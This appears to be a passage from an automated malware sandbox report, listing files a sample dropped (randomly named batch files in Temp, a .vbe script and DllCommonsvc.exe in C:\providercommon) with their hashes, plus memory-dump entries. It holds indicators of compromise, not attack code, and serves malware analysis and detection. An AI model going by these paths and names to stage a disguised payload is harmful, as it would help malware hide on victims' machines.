                                          SHA512

                                          14ad56fe673e7f715a2bf54e53b480c3e806304360986e2ce075dd56235ac4e42d5bbfc72c4b1ab19d659aeb3e326fd2ab2a4a54c8154813e073e58d8a86009f

                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                          Filesize

                                          342B

                                          MD5

                                          89e865f14c7c39679efdf0d2553a9eaa

                                          SHA1

                                          d76c3f8e21c237998722bae33706d801cda1762e

                                          SHA256

                                          2979ad03f4bf53ea3a10c8356344afd48126e0322bdfe42d7089b19e6914c73c

                                          SHA512

                                          c695484cc8631695977e1934a0aeeefaab97af935f3ad10715f7f529f05aa11b4dc4807524c12a65faba7d252661efbd6a8cf81c5a1e0269fc112c0f09f156f8

                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                          Filesize

                                          342B

                                          MD5

                                          bfd52ec299fcd7c4d020b63c659112cc

                                          SHA1

                                          307b072de0ab2f3f52f6d6ef5971e6e392f6580a

                                          SHA256

                                          1bc62ccaef1f1beff0791dda7a8c1b390a653341e54ec2ccf58194ff0b6529f0

                                          SHA512

                                          8c94bbf2aa78f6f47b0677df6739f3f778c3cc0638995da5fee910b785ecef1892a49770f2fcabae161082fada18b06028f12b6cb394201729fb38df9ecc4bd1

                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                          Filesize

                                          342B

                                          MD5

                                          77819f8daeb4528ee6b58401af1cc33f

                                          SHA1

                                          9f9b04066c0ae82445142076d80837e1970b3e01

                                          SHA256

                                          7e4ab2398e9bbdfc5fa20fe3f087e4b00718257a6e9a3e656f27378801c21eec

                                          SHA512

                                          bed52d9bff68475d1d7e3301c8f5a822da156e6cc48b7090735a37329edf53c34cbac7da451cfd7799f593e165bee991f2b3595b10f23e5258901cb5618624f4

                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                          Filesize

                                          342B

                                          MD5

                                          64b8af758913f3755bfef3a61b4de612

                                          SHA1

                                          5360ddfc41953c5b5cac948544bb7742970c1151

                                          SHA256

                                          43b0c785516bf9cf5aa7625d17829901853a4055623ab1c564830b1a9bc8a4de

                                          SHA512

                                          12b7cca6c208b92880588a6b778c389e5fe923d6cb012ca6f92a3cd4005b36f44c33de18f57fa42d044a30f022701408305d61019725b6549db394f609f8276c

                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                          Filesize

                                          342B

                                          MD5

                                          9ae897d8ef747ffaba71c32b1911ea07

                                          SHA1

                                          e2c4a696d60fb276ac63fed71b2aadbe815a861e

                                          SHA256

                                          ce7e89a1f71c04c7b84a402080a9253b65b01c9ce9221203916c6ac0fc9dd5eb

                                          SHA512

                                          4423d0dd6b3e60ddbb56188f9b49b2574c9192d5b75be17c9f6d92e7d8246caa128b9b002cb79b90b0b57fca0bbbaa8dcbe23b48b1a694864c67fc24faaa5d43

                                        • C:\Users\Admin\AppData\Local\Temp\410ZzJtAuR.bat

                                          Filesize

                                          228B

                                          MD5

                                          e58b5d98c8834c619d74207cff57b98b

                                          SHA1

                                          88ab5989b6bb97ee00a33f90b05b9e908bed050b

                                          SHA256

                                          63e322db3a4ed4f1e8748eff5e083800029a01f7d73b161c84b7fafc90ba0d4f

                                          SHA512

                                          77e94552aefa7c591bd368bd8b6e933d3c73898156a9d8cf16df1121c2951f2bdc31b0f86cc1e000233e126dec060e2a9084901cc6fd4d59365ace866b4dee0f

                                        • C:\Users\Admin\AppData\Local\Temp\CabFF19.tmp

                                          Filesize

                                          70KB

                                          MD5

                                          49aebf8cbd62d92ac215b2923fb1b9f5

                                          SHA1

                                          1723be06719828dda65ad804298d0431f6aff976

                                          SHA256

                                          b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

                                          SHA512

                                          bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

                                        • C:\Users\Admin\AppData\Local\Temp\EUl4QLAvAv.bat

                                          Filesize

                                          228B

                                          MD5

                                          cd1b4610783aba83a6d58399033311bc

                                          SHA1

                                          15f2051ae0b6433acfd3cff4d7bd89eb5068fbc7

                                          SHA256

                                          7d946e5fb274255d18ebc9fe835005744336d690e215df00edcb3261e7c00378

                                          SHA512

                                          885dc0a3f1789624d1d61bc982041b1b3046af4b76d8993bebf27f30d90285708d8348faad1379b116062be5084f7a8a80270b39febc8f35af9093f0e295dbea

                                        • C:\Users\Admin\AppData\Local\Temp\IrGY9odMle.bat

                                          Filesize

                                          228B

                                          MD5

                                          1848e3cc522c4699f7dc7cc951979edf

                                          SHA1

                                          72b0244c82eab3f0e0550fe9500bef08e72999b5

                                          SHA256

                                          26b56da88df486c7c65ef6366d89a272cff766a9485a05906ebfff674dfd8d0d

                                          SHA512

                                          f8213f076c12f8f555aadf3ec22fa976ceb8491cb89309b72a581b2412656b038f9fc9a5287413b6ead471a59918e7fb172234ff42ea401b780fc869dade5a64

                                        • C:\Users\Admin\AppData\Local\Temp\KVYyjDtEXm.bat

                                          Filesize

                                          228B

                                          MD5

                                          dc9be7e231537809d1c97c83678bf21c

                                          SHA1

                                          fceed099cb85dd4766fa98caf4b14acdef55cdbc

                                          SHA256

                                          da0e92ebfb05d595d8993b90fa66244e7fe53408d3b55851e3528e7cc5387431

                                          SHA512

                                          d024aba4900fcb6742ea71b0d307a458dbe200e377c029f7edb342978fd5c5604fdf570e419baabed29dbc936e0448e787e16640201b4f31044f9c784c9d5df5

                                        • C:\Users\Admin\AppData\Local\Temp\TarFF3B.tmp

                                          Filesize

                                          181KB

                                          MD5

                                          4ea6026cf93ec6338144661bf1202cd1

                                          SHA1

                                          a1dec9044f750ad887935a01430bf49322fbdcb7

                                          SHA256

                                          8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

                                          SHA512

                                          6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

                                        • C:\Users\Admin\AppData\Local\Temp\X5jGqiFaSS.bat

                                          Filesize

                                          228B

                                          MD5

                                          4921af15fe5e5b81e34d583196141baf

                                          SHA1

                                          71d6e9dbacceeeb9eaee7d391a52f4d79f80428c

                                          SHA256

                                          e14888907e525b2435a2a865f7f774aa27fdb689b21f5fb4aa093b750dce0be1

                                          SHA512

                                          a430975de19a60252c9d09e1b5260f8734f97738a77616c60de45d8468230b52007420098992858030ba79c5682c7fe1d6a2d4caca0b530c83a573e54730acdf

                                        • C:\Users\Admin\AppData\Local\Temp\YtdDrdHd9N.bat

                                          Filesize

                                          199B

                                          MD5

                                          b8bb9086e3e9636f10c86303810cfa1c

                                          SHA1

                                          180e40b3e4016e87d678673f38d267bc5aa0a337

                                          SHA256

                                          338e44cd08aa3278cb31242ea8f4566bff246805c319b2d0514df07870d2ff96

                                          SHA512

                                          02322436bf95a57349e6d748aa9c05a1412190d93ac79d025c63af7af5a661d88019e4508d232a39e93312d072ad835f48efcbc01d4c609870023e84ed242be0

                                        • C:\Users\Admin\AppData\Local\Temp\asjVMp8zxr.bat

                                          Filesize

                                          228B

                                          MD5

                                          b12740bfd0f4656350ee80626b31b698

                                          SHA1

                                          056612adcc00d2a22935422d4f152b72492dd140

                                          SHA256

                                          975c82d743d1c2887d7bd46e1bf86fb70e851144e48f46801bef2d4a80a94b91

                                          SHA512

                                          c7c8940fd5037e2d1d17a5d064c52ba4be2570681f2619098619425de89b80a3df6d44a511b0998ac6f33c489edeef3753226d0ee55685626a663489e7788c90

                                        • C:\Users\Admin\AppData\Local\Temp\jaxwQXfGLd.bat

                                          Filesize

                                          228B

                                          MD5

                                          a8ed6df5142e62ace1d49711630dc32e

                                          SHA1

                                          b4070d4f217b2574a55fad985ad35ffaec1affb3

                                          SHA256

                                          9b9e0b7e7675fffe8bf644bae83f45f3ef221263906305b6e5ef9bc0c88a5d92

                                          SHA512

                                          4e555b6ee10de9a46635affe982b7e7da580875fc1c3ba0d3a2da89158f7f73f1ab9bc9e1a682ebeb1c99a4feba534eff0c62e74e46b12969b009a1093a3a6c9

                                        • C:\Users\Admin\AppData\Local\Temp\nAABNdhKLs.bat

                                          Filesize

                                          228B

                                          MD5

                                          2326fa76f1200322667b57d4e8468e0c

                                          SHA1

                                          dd2904bf68f272c25b3100e19d1ebf0511dd74eb

                                          SHA256

                                          06b9ecfd52018979683ffd90636c97cee35d05dece76dabadfa511edc21da054

                                          SHA512

                                          5dd0a27e7a0517072e413b89a107f2ef2cc7be8b62e85167a12c92d818c6b0bde59a4aab70bc03ef5294c8d6a7a9b85b12f610d40761230b85f76f78748b12d7

                                        • C:\Users\Admin\AppData\Local\Temp\tYG4XGbOex.bat

                                          Filesize

                                          228B

                                          MD5

                                          5e5f4c24db333c4304b4675156600c39

                                          SHA1

                                          db70f9dddfebee3da15864b5eab0c2455f68daac

                                          SHA256

                                          27f8ea595141fdaaac420655d0a67970292bb8b2e936f23b88ef1397c5589691

                                          SHA512

                                          2ac52945ec26a7c4a472bcd6731c458ed53be578372c1333939ae10c8aa3546cf1c4147f863c84a7eb998b784a3a118d1cd6b3ca53fad853d402510645d702a3

                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                          Filesize

                                          7KB

                                          MD5

                                          3d24c9b0473704bad71c06979c47bed4

                                          SHA1

                                          2bde3d9e38e888030eefbdb2224dec88e859d10e

                                          SHA256

                                          6059952a3136dbddc9dc5050d62aa73304694e888219f10bc64fe5922417a266

                                          SHA512

                                          d135b439452b0cc6368595fcbde70db33b0050648020563f5b0fd258c804547634cdd63e91567ab93c82e16d61dcccb04d00e48a5f413a11586b34efe3d04cc4

                                        • C:\providercommon\1zu9dW.bat

                                          Filesize

                                          36B

                                          MD5

                                          6783c3ee07c7d151ceac57f1f9c8bed7

                                          SHA1

                                          17468f98f95bf504cc1f83c49e49a78526b3ea03

                                          SHA256

                                          8ab782f0f327a2021530e7230d3aee8abbecb7eed59482a3a46e78b9e3862322

                                          SHA512

                                          c6012d4bfac1ed14d0fd9f0eabd0e1c3d647b343db292a907b246271d52a4b7469c809db43910ddba2e8c5045f9cb3d24d0af62d363281e6cb8b39ee94a183e8

                                        • C:\providercommon\yTUdeXjbLOhnrN32dgrxVg.vbe

                                          Filesize

                                          197B

                                          MD5

                                          8088241160261560a02c84025d107592

                                          SHA1

                                          083121f7027557570994c9fc211df61730455bb5

                                          SHA256

                                          2072cc9a4a3b84d4c5178ab41c5588eea7d0103e3928e34d64f17bf97f3d1cc1

                                          SHA512

                                          20d9369dd359315848ea30144383a0bb479d86059fdbc3b3256ac84f998193512feb3b1799ab663619920c99fe7e0ebba33ada31a3855094b956fcd351c90478

                                        • \providercommon\DllCommonsvc.exe

                                          Filesize

                                          1.0MB

                                          MD5

                                          bd31e94b4143c4ce49c17d3af46bcad0

                                          SHA1

                                          f8c51ff3ff909531d9469d4ba1bbabae101853ff

                                          SHA256

                                          b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63

                                          SHA512

                                          f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

                                        • memory/1380-670-0x00000000003D0000-0x00000000004E0000-memory.dmp

                                          Filesize

                                          1.1MB

                                        • memory/1428-15-0x0000000000300000-0x000000000030C000-memory.dmp

                                          Filesize

                                          48KB

                                        • memory/1428-14-0x00000000002E0000-0x00000000002F2000-memory.dmp

                                          Filesize

                                          72KB

                                        • memory/1428-13-0x0000000000040000-0x0000000000150000-memory.dmp

                                          Filesize

                                          1.1MB

                                        • memory/1428-16-0x00000000002F0000-0x00000000002FC000-memory.dmp

                                          Filesize

                                          48KB

                                        • memory/1428-17-0x0000000000310000-0x000000000031C000-memory.dmp

                                          Filesize

                                          48KB

                                        • memory/1540-490-0x00000000012F0000-0x0000000001400000-memory.dmp

                                          Filesize

                                          1.1MB

                                        • memory/2008-310-0x0000000000120000-0x0000000000230000-memory.dmp

                                          Filesize

                                          1.1MB

                                        • memory/2060-54-0x0000000001E70000-0x0000000001E78000-memory.dmp

                                          Filesize

                                          32KB

                                        • memory/2060-43-0x000000001B7A0000-0x000000001BA82000-memory.dmp

                                          Filesize

                                          2.9MB

                                        • memory/2068-191-0x00000000013C0000-0x00000000014D0000-memory.dmp

                                          Filesize

                                          1.1MB

                                        • memory/2120-107-0x0000000002290000-0x0000000002298000-memory.dmp

                                          Filesize

                                          32KB

                                        • memory/2120-106-0x000000001B680000-0x000000001B962000-memory.dmp

                                          Filesize

                                          2.9MB

                                        • memory/2152-101-0x0000000000950000-0x0000000000A60000-memory.dmp

                                          Filesize

                                          1.1MB

                                        • memory/2356-370-0x0000000001100000-0x0000000001210000-memory.dmp

                                          Filesize

                                          1.1MB

                                        • memory/2476-610-0x0000000000150000-0x0000000000260000-memory.dmp

                                          Filesize

                                          1.1MB

                                        • memory/2596-83-0x00000000010F0000-0x0000000001200000-memory.dmp

                                          Filesize

                                          1.1MB

                                        • memory/2604-550-0x0000000000220000-0x0000000000330000-memory.dmp

                                          Filesize

                                          1.1MB

                                        • memory/3064-430-0x0000000001180000-0x0000000001290000-memory.dmp

                                          Filesize

                                          1.1MB